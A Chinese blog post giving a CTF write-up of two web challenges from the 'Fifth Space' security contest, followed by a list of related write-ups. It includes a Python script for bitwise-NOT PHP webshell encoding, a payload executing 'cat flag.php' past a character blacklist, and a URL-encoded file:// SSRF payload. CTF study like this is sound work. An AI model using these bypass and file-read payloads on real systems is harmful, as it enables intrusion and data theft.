“第五空间” 智能安全大赛-web部分writeup

最新推荐文章于 2022-07-09 16:07:18 发布
最新推荐文章于 2022-07-09 16:07:18 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: CTF 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45372008/article/details/106970879
版权

前两天和小伙伴打了个比赛,记录下(真菜。。)

“第五空间” 智能安全大赛-web部分wp

  • hate-php

题目限制如下

if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { 
        die('You are too good for me'); 
}

将基本的字符都过滤了,此时想到无字母取反webshell
写个取反脚本

#__coding:utf-8__
def qufan(shell):
	for i in shell:
		hexbit=''.join(hex(~(-(256-ord(i)))))
		print (hexbit.replace('0x','%'),end='')
qufan('system')
print('	')
qufan('cat flag.php')

payload:

?code=(~(%8c%86%8c%8b%9a%92))(~(%9c%9e%8b%df%99%93%9e%98%d1%8f%97%8f))

  • do you konw

审计源码,考察ssrf
重点读两处


if(preg_match("/log|flag|hist|dict|etc|file|write/i" ,$poc)){ 
                die("no hacker"); 
}

在这里插入图片描述
思路:用协议读取flag.php文件
url编码绕过第一处限制且由于第一个变量和第二个变量强类型比较所以它们值完全相等
PS:如果两个变量值不相等,就会判断我们传参的个数,由于传入的参数必定是两个,所以唯一的方法就是让两个变量键值相等;
php类型比较
构造payload

?p=%66%69%6c%65:///var/www/html/%66%6c%61%67.php&q=%66%69%6c%65:///var/www/html/%66%6c%61%67.php

此处要求用file协议去读
在这里插入图片描述

其余题目等师傅们的wp就去复现一波

越今朝!
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第二届“网刃杯”网络安全大赛 部分writeup
ShenZ的博客
05-01 663
第二届“网刃杯”网络安全大赛 部分writeup ICS easyiec web sign_in upload ez_java Misc 玩坏的winxp File协议读hosts,得到IP扫描内网,发现172.73.24.100有一台主机
第七届山东省大学生网络安全技能大赛决赛writeup
CoolD's Blog
11-06 7705
先立个flag,以后每次比赛完都要复现写WP…
第五空间writeup-str4nge
wyj_1216 House
08-28 1387
web 空相 进入后: 尝试:id = 1 再次尝试:id = 1 and 1 = 1 尝试读取上面的php文件:25d99be830ad95b02f6f82235c8edcf7.php 发现token 于是: http://111.33.164.4:10001/25d99be830ad95b02f6f82235c8edcf7.php?token=1DJBAAA03PNLD02GJ2S1M...
2021-第五空间智能安全大赛-Web-pklovecloud
qq_53863234的博客
11-29 3362
<?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct()
[红明谷CTF 2021]write_shell
yym68686
10-22 662
[红明谷CTF 2021]write_shell 打开网页,发现源代码: <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!');
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 2162
CTFSHOW WEB入门 命令执行 web29-48
BUUCTF web小结 1.0
Sk1y的博客
12-21 633
目录 [ACTF2020 新生赛]Include [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping 方法一:绕过正则表达式 方法二:因为过滤了bash,但是没有过滤sh,可用下面的方法,flag在f12中 方法三:内敛执行绕过,将反引号内命令的输出作为输入执行,flag在f12中 总结 [ACTF2020 新生赛]Include 打开题目:注意一下F12里面的跳转,点击tips,跳转, ur
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码学、SQL注入、XSS攻击、CSRF漏洞等。 首先,第一层绕过机制涉及到字符串比较和MD5哈希。...
第一届HappyCTF大赛WriteUp.pdf
06-18
3. 第一届HappyCTF大赛由济南博赛网络技术有限公司提供资金支持,而杭州安恒信息技术有限公司则提供了技术支持。这表明在举办此类大赛中,企业赞助和技术支持都是不可或缺的。 4. 比赛的具体内容包括WEB安全、杂项...
第二届广东大学生网络安全攻防大赛 个人向Write Up
hfv13的博客
05-22 1807
第二届广东大学生网络安全攻防大赛 个人向Write Up
php异或绕过,CTF中php异或绕过preg_match
weixin_33397740的博客
04-03 2380
0x00:写在前面suctf的题目和强网杯都遇到这种类型题目了,正好就当做一个笔记来记录一下。$hhh= @$_GET['_'];if(!$hhh){highlight_file(__FILE__);}if(strlen($hhh)>18){die('One inch long, one inch strong!');}if ( preg_match('/[\x00- 0-9A-Za-z\'...
preg_match函数的用法和匹配字符的的含义
热门推荐
qq_42318977的博客
04-07 1万+
利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。 $string = "football"; if (preg_match('/foo/', $string)) { // 匹配正确 } 上面的例子将成功匹配,因为单词 football 里面包含 foo。现在我们来试一个更复杂的,例如验证一个 Email 地址。 $string
2021-01-18
m0_53314778的博客
01-18 545
知识点: BUUCTF web-[极客大挑战 2019]Secret File: 学会运用BrupSuite(抓包,爆破等许多功能): php伪协议 使用php伪协议去读取的原因? 返回审计php代码,发现文件包含,看到了 input (php://input: 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行),这个是伪协议的一种.结合题目一下想到的文件隐藏,于是我们猜测flag在后端文件中,并需要我们去读取他,传入的file经过了过滤,但是没有过滤filter php伪协议中
BUUCTF(web刷题记录一)
nareku的博客
04-16 8806
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
BUUCTF web(六)
m0_46616663的博客
11-25 2852
[BJDCTF2020]ZJCTF,不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
BUUCTF 5_17-5_19
XINO
05-19 3766
//刷了一点之前忘记刷的,鸽鸽鸽 [BJDCTF2020]EzPHP <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=red><B>This i
[ctf.show]命令执行29-54
Huamang的博客
03-01 2423
web 29 代码审计 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 涉及到一个函数preg_match(): 这个preg_match 函数用于执行一个正则表达式匹配。 看这次的判断是不能出现flag字样,后面的i意思
2020第五空间 web writeup
a3320315的博客
06-27 3405
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
ctfshow web入门 命令执行:52-54
rawrecruit的博客
04-03 1723
ctfshow web入门 命令执行篇的个人刷题记录。
西湖论剑安全大赛WriteUp分析
"西湖论剑WriteUp By Nu1L.pdf 是一份关于网络安全竞赛“西湖论剑”的解题报告,由Nu1L团队编写。报告涵盖了多个技术领域,包括Reverse(逆向工程)、ROR(Ruby on Rails框架漏洞利用)、TacticalArmed(可能涉及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值